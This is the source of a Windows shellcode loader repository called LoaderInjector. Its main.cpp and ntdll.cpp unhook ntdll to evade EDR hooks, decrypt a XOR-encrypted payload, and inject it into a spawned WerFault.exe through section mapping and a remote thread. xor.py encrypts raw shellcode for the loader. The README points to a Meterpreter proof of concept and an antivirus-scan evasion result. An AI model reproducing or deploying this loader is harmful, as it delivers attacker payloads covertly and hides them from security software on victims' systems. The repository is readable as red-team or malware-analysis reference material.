├── meter_werfault.png
├── antiscan_werfault.png
├── LoaderInjector
    ├── LoaderInjector.aps
    ├── LoaderInjector.vcxproj.user
    ├── resource.h
    ├── LoaderInjector.vcxproj.filters
    ├── LoaderInjector.rc
    ├── main.cpp
    ├── ntdll.cpp
    ├── LoaderInjector.vcxproj
    ├── addresshunter.h
    └── ntdll.h
├── .gitignore
├── README.md
├── LICENSE
├── xor.py
└── LoaderInjector.sln


/meter_werfault.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/LoaderInjector/HEAD/meter_werfault.png


--------------------------------------------------------------------------------
/antiscan_werfault.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/LoaderInjector/HEAD/antiscan_werfault.png


--------------------------------------------------------------------------------
/LoaderInjector/LoaderInjector.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/LoaderInjector/HEAD/LoaderInjector/LoaderInjector.aps


--------------------------------------------------------------------------------
/LoaderInjector/LoaderInjector.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | # Prerequisites
 2 | *.d
 3 | 
 4 | # Compiled Object files
 5 | *.slo
 6 | *.lo
 7 | *.o
 8 | *.obj
 9 | 
10 | # Precompiled Headers
11 | *.gch
12 | *.pch
13 | 
14 | # Compiled Dynamic libraries
15 | *.so
16 | *.dylib
17 | *.dll
18 | 
19 | # Fortran module files
20 | *.mod
21 | *.smod
22 | 
23 | # Compiled Static libraries
24 | *.lai
25 | *.la
26 | *.a
27 | *.lib
28 | 
29 | # Executables
30 | *.exe
31 | *.out
32 | *.app
33 | 


--------------------------------------------------------------------------------
/LoaderInjector/resource.h:
--------------------------------------------------------------------------------
 1 | //{{NO_DEPENDENCIES}}
 2 | // Microsoft Visual C++ generated include file.
 3 | // Used by LoaderInjector.rc
 4 | //
 5 | #define IDR_PAYLOAD1                    101
 6 | 
 7 | // Next default values for new objects
 8 | // 
 9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE        102
12 | #define _APS_NEXT_COMMAND_VALUE         40001
13 | #define _APS_NEXT_CONTROL_VALUE         1001
14 | #define _APS_NEXT_SYMED_VALUE           101
15 | #endif
16 | #endif
17 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # LoaderInjector
 2 | 
 3 | ### Details: 
 4 | - syscall unhooking using FreshCopy
 5 | - payload encryption using xor - loaded as an argument
 6 | - process injection - targeting 'WerFault.exe'
 7 | 
 8 | ### Usage:
 9 | - make a raw shellcode and encrypt it using [xor](https://github.com/MaorSabag/LoaderInjector/blob/main/xor.py)
10 | - Compile the LoaderInjector an execute it giving the shellcode as an arguemnt
11 | 
12 | ### POC:
13 | ![poc](https://github.com/MaorSabag/LoaderInjector/blob/main/meter_werfault.png)
14 | 
15 | ### AntiScan 01-11-2022:
16 | ![antiscan](https://github.com/MaorSabag/LoaderInjector/blob/main/antiscan_werfault.png)
17 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2022 Maor Sabag
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/xor.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | 
 3 | KEY = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
 4 | 
 5 | def xor(data, key):
 6 | 	
 7 | 	key = str(key)
 8 | 	l = len(key)
 9 | 	output_str = ""
10 | 
11 | 	for i in range(len(data)):
12 | 		current = data[i]
13 | 		current_key = key[i % len(key)]
14 | 		try:
15 | 			output_str += chr(current ^ ord(current_key))
16 | 		except:
17 | 			output_str += chr(ord(current) ^ ord(current_key))
18 | 	
19 | 	return output_str
20 | 
21 | 
22 | def printCiphertext(ciphertext):
23 | 	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
24 | 
25 | 
26 | def main():
27 |     if len(sys.argv) != 3:
28 |         print(f"File arguments needed! {sys.argv[0]} <raw payload file> <output file name>")
29 |         exit(1)
30 | 
31 | 
32 |     plaintext = open(sys.argv[1], "rb").read()
33 | 
34 | 
35 | 
36 |     ciphertext = xor(plaintext, KEY)
37 |     hex_cipher = '\\x' + '\\x'.join(hex(ord(x))[2:].zfill(2) for x in ciphertext) + ''
38 | 
39 |     python_file = """a=b"((replace_me))"
40 |     with open("((name_replace))", "wb") as h: h.write(a)""".replace(r"((replace_me))", hex_cipher).replace(r"((name_replace))", sys.argv[2])
41 | 
42 |     exec(python_file)
43 | 
44 | 
45 | if __name__ == "__main__":
46 |     main()
47 | 


--------------------------------------------------------------------------------
/LoaderInjector/LoaderInjector.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |   </ItemGroup>
13 |   <ItemGroup>
14 |     <ClCompile Include="ntdll.cpp">
15 |       <Filter>Source Files</Filter>
16 |     </ClCompile>
17 |     <ClCompile Include="main.cpp">
18 |       <Filter>Source Files</Filter>
19 |     </ClCompile>
20 |   </ItemGroup>
21 |   <ItemGroup>
22 |     <ClInclude Include="ntdll.h">
23 |       <Filter>Header Files</Filter>
24 |     </ClInclude>
25 |     <ClInclude Include="addresshunter.h">
26 |       <Filter>Header Files</Filter>
27 |     </ClInclude>
28 |     <ClInclude Include="resource.h">
29 |       <Filter>Header Files</Filter>
30 |     </ClInclude>
31 |   </ItemGroup>
32 | </Project>


--------------------------------------------------------------------------------
/LoaderInjector.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.0.32014.148
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "LoaderInjector", "LoaderInjector\LoaderInjector.vcxproj", "{F0E1F52D-3103-42F7-9F49-061A7D1BC3AA}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{F0E1F52D-3103-42F7-9F49-061A7D1BC3AA}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{F0E1F52D-3103-42F7-9F49-061A7D1BC3AA}.Debug|x64.Build.0 = Debug|x64
18 | 		{F0E1F52D-3103-42F7-9F49-061A7D1BC3AA}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{F0E1F52D-3103-42F7-9F49-061A7D1BC3AA}.Debug|x86.Build.0 = Debug|Win32
20 | 		{F0E1F52D-3103-42F7-9F49-061A7D1BC3AA}.Release|x64.ActiveCfg = Release|x64
21 | 		{F0E1F52D-3103-42F7-9F49-061A7D1BC3AA}.Release|x64.Build.0 = Release|x64
22 | 		{F0E1F52D-3103-42F7-9F49-061A7D1BC3AA}.Release|x86.ActiveCfg = Release|Win32
23 | 		{F0E1F52D-3103-42F7-9F49-061A7D1BC3AA}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {4C9C9CCC-8EEA-4CB0-827C-F19ADC4A59C1}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/LoaderInjector/LoaderInjector.rc:
--------------------------------------------------------------------------------
 1 | // Microsoft Visual C++ generated resource script.
 2 | //
 3 | #include "resource.h"
 4 | 
 5 | #define APSTUDIO_READONLY_SYMBOLS
 6 | /////////////////////////////////////////////////////////////////////////////
 7 | //
 8 | // Generated from the TEXTINCLUDE 2 resource.
 9 | //
10 | #include "winres.h"
11 | 
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 | 
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 | 
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 | 
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 | 
28 | 1 TEXTINCLUDE 
29 | BEGIN
30 |     "resource.h\0"
31 | END
32 | 
33 | 2 TEXTINCLUDE 
34 | BEGIN
35 |     "#include ""winres.h""\r\n"
36 |     "\0"
37 | END
38 | 
39 | 3 TEXTINCLUDE 
40 | BEGIN
41 |     "\r\n"
42 |     "\0"
43 | END
44 | 
45 | #endif    // APSTUDIO_INVOKED
46 | 
47 | 
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // payload
51 | //
52 | 
53 | IDR_PAYLOAD1            payload                 "payload.bin"
54 | 
55 | #endif    // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 | 
58 | 
59 | 
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 | 
66 | 
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif    // not APSTUDIO_INVOKED
69 | 
70 | 


--------------------------------------------------------------------------------
/LoaderInjector/main.cpp:
--------------------------------------------------------------------------------
  1 | #include "ntdll.h"
  2 | #include <stdio.h>
  3 | 
  4 | 
  5 | #define LARGE_NUMBER 500000
  6 | #define STATUS_SUCCESS 0
  7 | #define INJECTED_PROCESS_NAME L"\\??\\C:\\Windows\\System32\\werfault.exe"
  8 | 
  9 | typedef HMODULE(WINAPI* LoadLibraryW_t)(LPCWSTR lpLibFileName);
 10 | 
 11 | void sleep()
 12 | {
 13 | 	for (int i = 0; i <= LARGE_NUMBER; i++)
 14 | 	{
 15 | 		for (int j = 2; j <= i / 2; j++)
 16 | 		{
 17 | 			if (i % j == 0)
 18 | 			{
 19 | 				break;
 20 | 			}
 21 | 		}
 22 | 	}
 23 | }
 24 | 
 25 | char key[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
 26 | 
 27 | void XOR(char* data, size_t data_len, char* key, size_t key_len) {
 28 | 	int j;
 29 | 
 30 | 	j = 0;
 31 | 	for (int i = 0; i < data_len; i++) {
 32 | 		if (j == key_len - 1) j = 0;
 33 | 
 34 | 		data[i] = data[i] ^ key[j];
 35 | 		j++;
 36 | 	}
 37 | }
 38 | 
 39 | 
 40 | 
 41 | int main(int argc, char** argv)
 42 | {
 43 | 
 44 | 
 45 | 	if (argc != 2) {
 46 | 		printf("Usage %s <shellcode file>\n", argv[0]);
 47 | 		return 1;
 48 | 	}
 49 | 
 50 | 	sleep();
 51 | 
 52 | 	UINT64 LoadLibraryAFunc, kernel32dll;
 53 | 	wchar_t ntdll_c[] = { 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l', 0 };
 54 | 	kernel32dll = GetKernel32();
 55 | 	CHAR loadlibrarya_c[] = { 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'W', 0 };
 56 | 	LoadLibraryAFunc = GetSymbolAddress((HANDLE)kernel32dll, loadlibrarya_c);
 57 | 	HMODULE ntdll = (HMODULE)((LoadLibraryW_t)LoadLibraryAFunc)(ntdll_c);
 58 | 
 59 | 	if (ntdll == NULL)
 60 | 	{
 61 | 		exit(1);
 62 | 	}
 63 | 
 64 | 	unhookNtdll((HMODULE)ntdll);
 65 | 	loadNtdll((HMODULE)ntdll);
 66 | 
 67 |     HANDLE file = NULL;
 68 |     DWORD fileSize = NULL;
 69 |     DWORD bytesRead = NULL;
 70 |     LPVOID fileData = NULL;
 71 |     // Reading our encrypted shellcode
 72 |     file = CreateFileA(argv[1], GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
 73 |     if (file == INVALID_HANDLE_VALUE) {
 74 |         return 1;
 75 |     }
 76 |     fileSize = GetFileSize(file, NULL);
 77 |     fileData = HeapAlloc(GetProcessHeap(), 0, fileSize);
 78 |     ReadFile(file, fileData, fileSize, &bytesRead, NULL);
 79 |     unsigned char* shellcode = (unsigned char*)fileData;
 80 |         
 81 |     printf("[+] Read the shellcode size is %d\n", fileSize);
 82 |     
 83 |     SIZE_T shellcodeSize = fileSize;
 84 |     
 85 |     HANDLE hSection = NULL;
 86 |     NTSTATUS status = NULL;
 87 |     SIZE_T size = fileSize;
 88 |     LARGE_INTEGER sectionSize = { size };
 89 |     PVOID pLocalView = NULL, pRemoteView = NULL;
 90 |     int viewUnMap = 2;
 91 | 
 92 |     HANDLE currentProcess = GetCurrentProcess();
 93 |     UNICODE_STRING imagePathName = {};
 94 |     PRTL_USER_PROCESS_PARAMETERS targetProcessParameters = NULL;
 95 |     PRTL_USER_PROCESS_INFORMATION targetProcessInformation = NULL;
 96 | 
 97 |     XOR((char*)shellcode, shellcodeSize, key, sizeof(key));
 98 | 
 99 |     if ((status = ZwCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, (PLARGE_INTEGER)&sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS) {
100 |         printf("[-] Cannot create section. Error code: %08X\n", status);
101 |         return -1;
102 |     }
103 |     printf("[+] Section: %p\n", hSection);
104 | 
105 |     if ((status = NtMapViewOfSection(hSection, currentProcess,
106 |         &pLocalView, NULL, NULL, NULL,
107 |         (PULONG)&size, (SECTION_INHERIT)viewUnMap, NULL, PAGE_READWRITE)) != STATUS_SUCCESS) {
108 |         printf("[-] Cannot create Local view. Error code: %08X\n", status);
109 |         return -1;
110 |     }
111 |     printf("[+] Local view: %p\n", pLocalView);
112 | 
113 |     printf("[+] Copying shellcode into the view\n");
114 | 
115 |     VxMoveMemory(pLocalView, shellcode, shellcodeSize);
116 | 
117 |     RtlInitUnicodeString(&imagePathName, INJECTED_PROCESS_NAME);
118 |     RtlCreateProcessParameters(&targetProcessParameters, &imagePathName, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL);
119 |     targetProcessInformation = (PRTL_USER_PROCESS_INFORMATION)malloc(sizeof(PRTL_USER_PROCESS_INFORMATION));
120 |     RtlCreateUserProcess(&imagePathName, NULL, targetProcessParameters, NULL, NULL, currentProcess, FALSE, NULL, NULL, targetProcessInformation);
121 | 
122 |     if ((status = NtMapViewOfSection(hSection, targetProcessInformation->ProcessHandle, &pRemoteView, NULL, NULL, NULL,
123 |         (PULONG)&size, (SECTION_INHERIT)viewUnMap, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) {
124 |         printf("[-] Cannot create remote view. Error code: %08X\n", status);
125 |         return -1;
126 |     }
127 |     printf("[+] Remote view: %p\n", pRemoteView);
128 | 
129 |     printf("[+] Sleeping for 4.27 seconds...\n");
130 |     LARGE_INTEGER interval;
131 |     interval.QuadPart = -1 * (int)(4270 * 10000.0f);
132 |     if ((status = NtDelayExecution(TRUE, &interval)) != STATUS_SUCCESS) {
133 |         printf("[-] Cannot delay execution. Error code: %08X\n", status);
134 |         return -1;
135 |     }
136 |     
137 |     HANDLE hThread = NULL;
138 |     if ((status = ZwCreateThreadEx(&hThread, 0x1FFFFF, NULL, targetProcessInformation->ProcessHandle, pRemoteView, NULL, CREATE_SUSPENDED, 0, 0, 0, 0)) != STATUS_SUCCESS) {
139 |         printf("[-] Cannot create thread. Error code: %08X\n", status);
140 |         return -1;
141 |     }
142 |     printf("[+] Thread: %p\n", hThread);
143 | 
144 |     printf("[+] Sleeping again for 4.27 seconds...\n");
145 |     interval.QuadPart = -1 * (int)(4270 * 10000.0f);
146 |     if ((status = NtDelayExecution(TRUE, &interval)) != STATUS_SUCCESS) {
147 |         printf("[-] Cannot delay execution. Error code: %08X\n", status);
148 |         return -1;
149 |     }
150 | 
151 |     printf("[+] Executing thread.\n");
152 |     NtResumeThread(hThread, 0);
153 | 
154 | 	FreeLibrary(ntdll);
155 | 	return 0;
156 | }
157 | 
158 | 


--------------------------------------------------------------------------------
/LoaderInjector/ntdll.cpp:
--------------------------------------------------------------------------------
  1 | #include "ntdll.h"
  2 | #include "addresshunter.h"
  3 | 
  4 | NtMapViewOfSecion_t NtMapViewOfSection = NULL;
  5 | NtUnmapViewOfSection_t NtUnmapViewOfSection = NULL;
  6 | RtlInitUnicodeString_t RtlInitUnicodeString = NULL;
  7 | RtlCreateProcessParameters_t RtlCreateProcessParameters = NULL;
  8 | RtlCreateUserProcess_t RtlCreateUserProcess = NULL;
  9 | RtlCreateUserThread_t RtlCreateUserThread = NULL;
 10 | NtClose_t NtClose = NULL;
 11 | NtResumeThread_t NtResumeThread = NULL;
 12 | ZwOpenProcess_t ZwOpenProcess = NULL;
 13 | ZwCreateSection_t ZwCreateSection = NULL;
 14 | ZwCreateThreadEx_t ZwCreateThreadEx = NULL;
 15 | NtDelayExecution_t NtDelayExecution = NULL;
 16 | CreateFileA_t pCreateFileA = NULL;
 17 | VirtualProtect_t pVirtualProtect = NULL;
 18 | CreateFileMappingA_t pCreateFileMappingA = NULL;
 19 | MapViewOfFile_t pMapViewOfFile = NULL;
 20 | 
 21 | 
 22 | void XORcrypt(char str2xor[], size_t len, char key) {
 23 | 	/*
 24 | 			XORcrypt() is a simple XOR encoding/decoding function
 25 | 	*/
 26 | 	int i;
 27 | 
 28 | 	for (i = 0; i < len; i++) {
 29 | 		str2xor[i] = (BYTE)str2xor[i] ^ key;
 30 | 	}
 31 | }
 32 | 
 33 | 
 34 | void unhookNtdll(HMODULE ntdll)
 35 | {
 36 | 	UINT64 kernel32dll;
 37 | 	kernel32dll = GetKernel32();
 38 | 
 39 | 	char cCreateFileA[] = {'C', 'r', 'e', 'a', 't', 'e', 'F', 'i', 'l', 'e', 'A',0};
 40 | 	char sCreateFileMappingA[] = { 'C','r','e','a','t','e','F','i','l','e','M','a','p','p','i','n','g','A', 0 };
 41 | 	char sMapViewOfFile[] = { 'M','a','p','V','i','e','w','O','f','F','i','l','e',0 };
 42 | 	char sVirtualProtect[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t', 0 };
 43 | 
 44 | 	pCreateFileA = (CreateFileA_t)GetSymbolAddress((HANDLE)kernel32dll, cCreateFileA);
 45 | 	pCreateFileMappingA = (CreateFileMappingA_t)GetSymbolAddress((HANDLE)kernel32dll, sCreateFileMappingA);
 46 | 	pMapViewOfFile = (MapViewOfFile_t)GetSymbolAddress((HANDLE)kernel32dll, sMapViewOfFile);
 47 | 	pVirtualProtect = (VirtualProtect_t)GetSymbolAddress((HANDLE)kernel32dll, sVirtualProtect);
 48 | 
 49 | 	HANDLE currentProcess = GetCurrentProcess();
 50 | 	MODULEINFO ntdllInformation = {};
 51 | 	unsigned char sNtdllPath[] = { 0x59, 0x0, 0x66, 0x4d, 0x53, 0x54, 0x5e, 0x55, 0x4d, 0x49, 0x66, 0x49, 0x43, 0x49, 0x4e, 0x5f, 0x57, 0x9, 0x8, 0x66, 0x54, 0x4e, 0x5e, 0x56, 0x56, 0x14, 0x5e, 0x56, 0x56, 0x3a };
 52 | 	unsigned char sNtdll[] = { 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l', 0x0 };
 53 | 	unsigned int sNtdll_len = sizeof(sNtdll);
 54 | 	unsigned int sNtdllPath_len = sizeof(sNtdllPath);
 55 | 
 56 | 	XORcrypt((char*)sNtdllPath, sNtdllPath_len, sNtdllPath[sNtdllPath_len - 1]);
 57 | 	
 58 | 	GetModuleInformation(currentProcess, ntdll, &ntdllInformation, sizeof(ntdllInformation));
 59 | 	LPVOID ntdllBase = (LPVOID)ntdllInformation.lpBaseOfDll;
 60 | 	HANDLE ntdllFile = pCreateFileA((LPCSTR)sNtdllPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
 61 | 	HANDLE ntdllMapping = pCreateFileMappingA(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
 62 | 	LPVOID ntdllMappingAddress = pMapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);
 63 | 
 64 | 	PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
 65 | 	PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew);
 66 | 
 67 | 	for (int i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++)
 68 | 	{
 69 | 		PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));
 70 | 
 71 | 		if (!my_strcmp((char*)hookedSectionHeader->Name, (char*)".text"))
 72 | 		{
 73 | 			DWORD oldProtection = 0;
 74 | 			bool isProtected = pVirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
 75 | 			VxMoveMemory((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize);
 76 | 			isProtected = pVirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);
 77 | 		}
 78 | 	}
 79 | 
 80 | 	CloseHandle(ntdllFile);
 81 | 	CloseHandle(ntdllMapping);
 82 | }
 83 | 
 84 | void checkNtStatus(NTSTATUS status)
 85 | {
 86 | 	if (!NT_SUCCESS(status))
 87 | 	{
 88 | 		exit(1);
 89 | 	}
 90 | }
 91 | 
 92 | void loadNtdll(HMODULE ntdll)
 93 | {
 94 | 	
 95 | 	char cNtMapViewOfSection[] = { 'N', 't', 'M', 'a', 'p', 'V', 'i', 'e', 'w', 'O', 'f', 'S', 'e', 'c', 't', 'i', 'o', 'n',0 };;
 96 | 	char cNtUnmapViewOfSection[] = { 'N', 't', 'U', 'n', 'm', 'a', 'p', 'V', 'i', 'e', 'w', 'O', 'f', 'S', 'e', 'c', 't', 'i', 'o', 'n',0 };
 97 | 	char cRtlInitUnicodeString[] = { 'R', 't', 'l', 'I', 'n', 'i', 't', 'U', 'n', 'i', 'c', 'o', 'd', 'e', 'S', 't', 'r', 'i', 'n', 'g',0 };
 98 | 	char cRtlCreateProcessParameters[] = { 'R', 't', 'l', 'C', 'r', 'e', 'a', 't', 'e', 'P', 'r', 'o', 'c', 'e', 's', 's', 'P', 'a', 'r', 'a', 'm', 'e', 't', 'e', 'r', 's',0 };
 99 | 	char cRtlCreateUserProcess[] = { 'R', 't', 'l', 'C', 'r', 'e', 'a', 't', 'e', 'U', 's', 'e', 'r', 'P', 'r', 'o', 'c', 'e', 's', 's',0 };
100 | 	char cRtlCreateUserThread[] = { 'R', 't', 'l', 'C', 'r', 'e', 'a', 't', 'e', 'U', 's', 'e', 'r', 'T', 'h', 'r', 'e', 'a', 'd',0 };
101 | 	char cNtClose[] = { 'N', 't', 'C', 'l', 'o', 's', 'e',0 };
102 | 	char cNtResumeThread[] = { 'N', 't', 'R', 'e', 's', 'u', 'm', 'e', 'T', 'h', 'r', 'e', 'a', 'd',0 };
103 | 
104 | 	
105 | 	NtMapViewOfSection = (NtMapViewOfSecion_t)GetSymbolAddress((HANDLE)ntdll, cNtMapViewOfSection);
106 | 	NtUnmapViewOfSection = (NtUnmapViewOfSection_t)GetSymbolAddress((HANDLE)ntdll, cNtUnmapViewOfSection);
107 | 	RtlInitUnicodeString = (RtlInitUnicodeString_t)GetSymbolAddress((HANDLE)ntdll, cRtlInitUnicodeString);
108 | 	RtlCreateProcessParameters = (RtlCreateProcessParameters_t)GetSymbolAddress((HANDLE)ntdll, cRtlCreateProcessParameters);
109 | 	RtlCreateUserProcess = (RtlCreateUserProcess_t)GetSymbolAddress((HANDLE)ntdll, cRtlCreateUserProcess);
110 | 	RtlCreateUserThread = (RtlCreateUserThread_t)GetSymbolAddress((HANDLE)ntdll, cRtlCreateUserThread);
111 | 	
112 | 	NtClose = (NtClose_t)GetSymbolAddress((HANDLE)ntdll, cNtClose);
113 | 	NtResumeThread = (NtResumeThread_t)GetSymbolAddress((HANDLE)ntdll, cNtResumeThread);
114 | 
115 | 	char cZwOpenProcess[] = { 'Z', 'w', 'O', 'p', 'e', 'n', 'P', 'r', 'o', 'c', 'e', 's', 's',0 };
116 | 	char cZwCreateSection[] = { 'Z', 'w', 'C', 'r', 'e', 'a', 't', 'e', 'S', 'e', 'c', 't', 'i', 'o', 'n',0 };
117 | 	char cZwCreateThreadEx[] = { 'Z', 'w', 'C', 'r', 'e', 'a', 't', 'e', 'T', 'h', 'r', 'e', 'a', 'd', 'E', 'x',0 };
118 | 	char cNtDelayExecution[] = { 'N', 't', 'D', 'e', 'l', 'a', 'y', 'E', 'x', 'e', 'c', 'u', 't', 'i', 'o', 'n',0 };
119 | 	char cZwClose[] = { 'Z', 'w', 'C', 'l', 'o', 's', 'e',0 };
120 | 
121 | 	
122 | 	ZwCreateSection = (ZwCreateSection_t)GetSymbolAddress((HANDLE)ntdll, cZwCreateSection);
123 | 	ZwCreateThreadEx = (ZwCreateThreadEx_t)GetSymbolAddress((HANDLE)ntdll, cZwCreateThreadEx);
124 | 	NtDelayExecution = (NtDelayExecution_t)GetSymbolAddress((HANDLE)ntdll, cNtDelayExecution);
125 | 	
126 | 	
127 | }
128 | 


--------------------------------------------------------------------------------
/LoaderInjector/LoaderInjector.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{f0e1f52d-3103-42f7-9f49-061a7d1bc3aa}</ProjectGuid>
 25 |     <RootNamespace>LoaderInjector</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
